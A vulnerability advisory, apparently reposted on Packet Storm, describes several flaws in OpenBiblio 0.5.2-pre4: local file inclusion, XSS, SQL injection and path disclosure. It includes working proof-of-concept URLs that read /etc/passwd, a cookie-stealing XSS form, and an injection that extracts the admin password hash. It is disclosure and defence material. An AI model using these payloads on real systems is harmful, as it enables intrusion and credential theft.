what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

openbiblio-multi.txt

openbiblio-multi.txt
Posted Dec 29, 2007
Authored by Juan Galiana Lara

OpenBiblio versions 0.5.2-pre4 and below suffer from multiple vulnerabilities including local file file inclusion, SQL injection, and cross site scripting.

tags | exploit, local, vulnerability, xss, sql injection, file inclusion
SHA-256 | 67dd9f532ea1edb5529740b43cee83aeb7b4260ff981ff5913d1e2b1a9c20998

openbiblio-multi.txt

Change Mirror Download
 - Security Advisory -



- OpenBiblio 0.5.2-pre4 and prior multiple vulnerabilities -
----------------------------------------------------


Product: OpenBiblio
Version: Version 0.5.2 Prerelease 4 and prior is affected
Url: https://obiblio.sourceforge.net/
Affected by: Full path disclosure, local file include, phpinfo
disclosure, multiple Cross Site Scripting, SQL injection




I. Introduction.

OpenBiblio is an easy to use, automated library system written in PHP
containing OPAC, circulation,
cataloging, and staff administration functionality.
OpenBiblio library administration offers an intuitive interface with
broad category tabs and sidebar.



II. Description


OpenBiblio suffers multiple bugs.




1) Local File Include vulnerability: its posible to include any
arbitrary local file using shared/help.php file

- Code -
if (isset($_GET["page"])) {
$page = $_GET["page"];
} else {
$page = "contents";
}
include("../locale/".OBIB_LOCALE."/help/".$page.".php");

- PoC -
https://site/openbiblio/shared/help.php?page=../../../../../../etc/passwd%00





2) Local File Include (2) (only works with register_globals On and
for non php files magic_quotes_gpc must be Off)

- Code -
<?php include("../navbars/".$tab.".php");?>

- PoC -
https://site/openbiblio/shared/header.php?tab=../../../etc/passwd%00





3) This link will show phpinfo

https://site/openbiblio/phpinfo.php

Remove it!



4) Path Disclosure

Some samples:

https://site/openbiblio/shared/footer.php
Fatal error: Call to a member function on a non-object in
/httpdocs/openbiblio/shared/footer.php on line 18

https://site/openbiblio/circ/mbr_fields.php
Fatal error: Call to a member function on a non-object in
/httpdocs/openbiblio/circ/mbr_fields.php on line 14


https://site/openbiblio/admin/custom_marc_form_fields.php
Fatal error: Cannot instantiate non-existent class: dmquery in
/httpdocs/openbiblio/admin/custom_marc_form_fields.php on line 14


Please, turn display_errors to Off in php.ini



6) Multiple Cross Site Scripting, an attacker can perform an XSS
attack that allows him to access the targeted user cookies


Some samples:

https://site/openbiblio/admin/staff_del_confirm.php?UID=1&LAST=[XSS]&FIRST=[XSS]

https://site/openbiblio/admin/theme_del_confirm.php?themeid=6&name=[XSS]

In /admin/theme_preview.php an attacker can inject an XSS in the var
themeName with method POST.
here is a poc:


<form action=" https://site/openbiblio/admin/theme_preview.php" method="post">
<input type="text" name="themeName" size="40" value="<script>alert(
document.cookie);</script>"><br><br>
<input type="submit" value="doit">
</form>




try with: <script>alert(document.cookie);</script>





6) SQL injection (session with report rol is needed to exploit this bug)


Any user with report rol can access any field of the database,
including admin md5 hash.


https://site/openbiblio/reports/report_criteria.php?reset=Y&rptid=balanceDueList&title=Balance+Due+Member+List&sql=%0A++++[SQL]%0A++

with this an attacker can get the md5 admin password:


https://site/openbiblio/reports/report_criteria.php?reset=Y&rptid=balanceDueList&title=Balance+Due+Member+List&sql=%0A++++select+username,pwd+from+staff%20where+userid=1%0A++

then click "run report" and view the results, besides, you can choose
between html and csv format ;)


staff.username staff.pwd
admin 21232f297a57a5a743894a0e4a801fc3



III. Timeline

20/08/2006 - Bugs discovered
25/08/2006 - Vendor Contacted
30/08/2006 - Release 0.5.2 (parcial patch)
21/02/2007 - Release 0.6.0 (full patch)
28/12/2007 - Advisory Disclosure




IV. Solution

Upgrade to 0.6.0 from https://obiblio.sourceforge.net/
Good work! :)


V. Credits

Juan Galiana <jgaliana gmail com>


Regards
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close